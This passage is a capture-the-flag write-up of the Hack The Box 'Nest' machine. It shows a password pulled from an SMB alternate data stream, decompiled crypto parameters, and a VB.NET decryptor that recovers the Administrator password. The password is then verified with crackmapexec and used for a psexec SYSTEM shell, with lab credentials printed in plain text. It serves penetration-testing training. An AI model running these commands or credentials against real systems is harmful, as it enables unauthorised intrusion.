-rwxr-xr-x 1 root root 17408 Aug  7  2019 './users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe'
-rwxr-xr-x 1 root root 0 Aug  8  2019 './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
-rwxr-xr-x 1 root root 249 Aug  8  2019 './users/C.Smith/HQK Reporting/HQK_Config_Backup.xml'
-rwxr-xr-x 1 root root 32 Aug  8  2019 ./users/C.Smith/user.txt
find: ‘./users/L.Frost’: Permission denied
find: ‘./users/R.Thompson’: Permission denied
find: ‘./users/TempUser’: Permission denied

User flag

u505@naos:~/HTB/Machines/Nest/mnt$ cat ./users/C.Smith/user.txt
<USER_FLAG>

Other important files

There is an executable file. It is an .Net assembly.

u505@naos:~/HTB/Machines/Nest/mnt$ file './users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe'
./users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

HQK Reportinga has something to do with the service found on port 4386.

u505@naos:~/HTB/Machines/Nest/mnt$ cat './users/C.Smith/HQK Reporting/HQK_Config_Backup.xml'
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>

The last file Debug Mode Password is empty.

u505@naos:~/HTB/Machines/Nest/mnt$ ls -l './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
-rwxr-xr-x 1 root root 0 Aug  8  2019 './users/C.Smith/HQK Reporting/Debug Mode Password.txt'

But checking it with smbclient, a Alternate data stream appears.

u505@naos:~/HTB/Machines/Nest$ smbclient \\\\10.10.10.178\\Users -U c.Smith
Enter WORKGROUP\c.Smith's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

10485247 blocks of size 4096. 6545619 blocks available smb: \> cd C.Smith smb: \C.Smith\> cd "HQK Reporting" smb: \C.Smith\HQK Reporting\> dir . D 0 Thu Aug 8 19:06:17 2019 .. D 0 Thu Aug 8 19:06:17 2019 AD Integration Module D 0 Fri Aug 9 08:18:42 2019 Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019 HQK_Config_Backup.xml A 249 Thu Aug 8 19:09:05 2019
10485247 blocks of size 4096. 6545619 blocks available smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt" altname: DEBUGM~1.TXT create_time: Thu Aug 8 07:06:12 PM 2019 EDT access_time: Thu Aug 8 07:06:12 PM 2019 EDT write_time: Thu Aug 8 07:08:17 PM 2019 EDT change_time: Thu Aug 8 07:08:17 PM 2019 EDT attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password" getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) smb: \C.Smith\HQK Reporting\> quit

The Debug password was hidden in the ADS.

u505@naos:~/HTB/Machines/Nest$ cat "Debug Mode Password.txt:Password"
WBQ201953D8w

Root flag

Disassemble HqkLdap.exe

With DNSPY, we can decompile the Intermediate Language (IL), I used a Windows box to run DNSPY.

There is a function DS, that seems to decrypt a string with some parameters calling the function RD.

Nest04.png

The function RD is identical to the function previously find. But this time the parameters have change.

* PassPhrase 667912
* Salt 1313Rf99
* 3 password iterations
* Init vector 1L1SA61493DRV53Z
* The key length is still 256 bits.

Nest05.png

Service on port 4386

After playing with the service, we can discover that command LIST do an ls on the current directory, the command SETDIR change the local directory, in debug mode, the command SHOWQUERY shows the content of the file.

u505@naos:~/HTB/Machines/Nest$ telnet nest 4386
Trying 10.10.10.178...
Connected to nest.
Escape character is '^]'.

HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> >list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS [1] Invoices (Ordered By Customer) [2] Products Sold (Ordered By Customer) [3] Products Sold In Last 30 Days
Current Directory: ALL QUERIES >setdir ..
Current directory set to HQK >list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES [DIR] LDAP [DIR] Logs [1] HqkSvc.exe [2] HqkSvc.InstallState [3] HQK_Config.xml
Current Directory: HQK >debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available >help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID>
>setdir ldap
Current directory set to ldap >list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe [2] Ldap.conf
Current Directory: ldap >showquery 2
Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
>quit
Was it something I said? Connection closed by foreign host.

In the LDAP directory, we find the same executable that we disassembled before, and the Ldap configuration with the encrypted password.

Decrypt administrator password

With the help of our previous program, we can decrypt the encrypted string, updating the encryption parameters and the encrypted password.

u505@naos:~/HTB/Machines/Nest/VBu505$ cat Program.vb
Imports System
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils


Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else 'Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) Return Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256) End If End Function
Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Return plainText End Function


End Class
Module Program Sub Main(args As String()) 'Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")) Console.WriteLine(Utils.DecryptString("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")) End Sub End Module

Running the program provides us with the clear password.

u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet run
XtH4nkS4Pl4y1nGX

Root flag

With crackmapexec, we can confim that the password is the Administrator password.

u505@naos:~/HTB/Machines/Nest/VBu505$ sudo crackmapexec smb 10.10.10.178/32 -u administrator -p XtH4nkS4Pl4y1nGX --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\administrator:XtH4nkS4Pl4y1nGX (Pwn3d!)
SMB         10.10.10.178    445    HTB-NEST         [+] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$          READ,WRITE      Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$              READ,WRITE      Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ,WRITE
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ,WRITE
SMB         10.10.10.178    445    HTB-NEST         Users           READ,WRITE

With psexec.py, we can obtain a shell in the machine.

u505@naos:~/HTB/Machines/Nest$ python3 /opt/utils/impacket/examples/psexec.py administrator@nest
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password: [*] Requesting shares on nest..... [*] Found writable share ADMIN$ [*] Uploading file BKaLscZa.exe [*] Opening SVCManager on nest..... [*] Creating service XuLc on nest..... [*] Starting service XuLc..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\Users\administrator\Desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 2C6F-6A14
Directory of c:\Users\Administrator\Desktop
01/26/2020 07:20 AM <DIR> . 01/26/2020 07:20 AM <DIR> .. 08/05/2019 10:27 PM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 26,811,756,544 bytes free
c:\Users\Administrator\Desktop>type root.txt <ROOT_FLAG> C:\Windows\system32>systeminfo Host Name: HTB-NEST OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7601 Service Pack 1 Build 7601 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00477-179-0000007-84361 Original Install Date: 8/5/2019, 9:22:30 PM System Boot Time: 12/27/2020, 5:15:00 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London Total Physical Memory: 2,047 MB Available Physical Memory: 1,654 MB Virtual Memory: Max Size: 4,095 MB Virtual Memory: Available: 3,679 MB Virtual Memory: In Use: 416 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): 68 Hotfix(s) Installed. [01]: KB981391 [02]: KB981392 [03]: KB977236 [04]: KB981111 [05]: KB977238 [06]: KB977239 [07]: KB981390 [08]: KB2305420 [09]: KB2393802 [10]: KB2425227 [11]: KB2484033 [12]: KB2488113 [13]: KB2505438 [14]: KB2506014 [15]: KB2506212 [16]: KB2506928 [17]: KB2509553 [18]: KB2511250 [19]: KB2511455 [20]: KB2522422 [21]: KB2544893 [22]: KB2545698 [23]: KB2547666 [24]: KB2552343 [25]: KB2560656 [26]: KB2563227 [27]: KB2564958 [28]: KB2570947 [29]: KB2585542 [30]: KB2598845 [31]: KB2603229 [32]: KB2607047 [33]: KB2608658 [34]: KB2618451 [35]: KB2620704 [36]: KB2621440 [37]: KB2631813 [38]: KB2640148 [39]: KB2643719 [40]: KB2653956 [41]: KB2654428 [42]: KB2660075 [43]: KB2667402 [44]: KB2676562 [45]: KB2685811 [46]: KB2685813 [47]: KB2685939 [48]: KB2690533 [49]: KB2698365 [50]: KB2705219 [51]: KB2709630 [52]: KB2712808 [53]: KB2718704 [54]: KB2726535 [55]: KB2729094 [56]: KB2741355 [57]: KB2758857 [58]: KB2761217 [59]: KB2765809 [60]: KB2770660 [61]: KB2791765 [62]: KB2807986 [63]: KB2813347 [64]: KB2840149 [65]: KB4012212 [66]: KB958488 [67]: KB976902 [68]: KB976932 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.178 [02]: fe80::9da7:5b52:920d:5876 [03]: dead:beef::9da7:5b52:920d:5876 c:\Users\Administrator\Desktop>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on nest..... [*] Stopping service XuLc..... [*] Removing service XuLc..... [*] Removing file BKaLscZa.exe.....

References

Daniel Simao 08:43, 27 December 2020 (EST)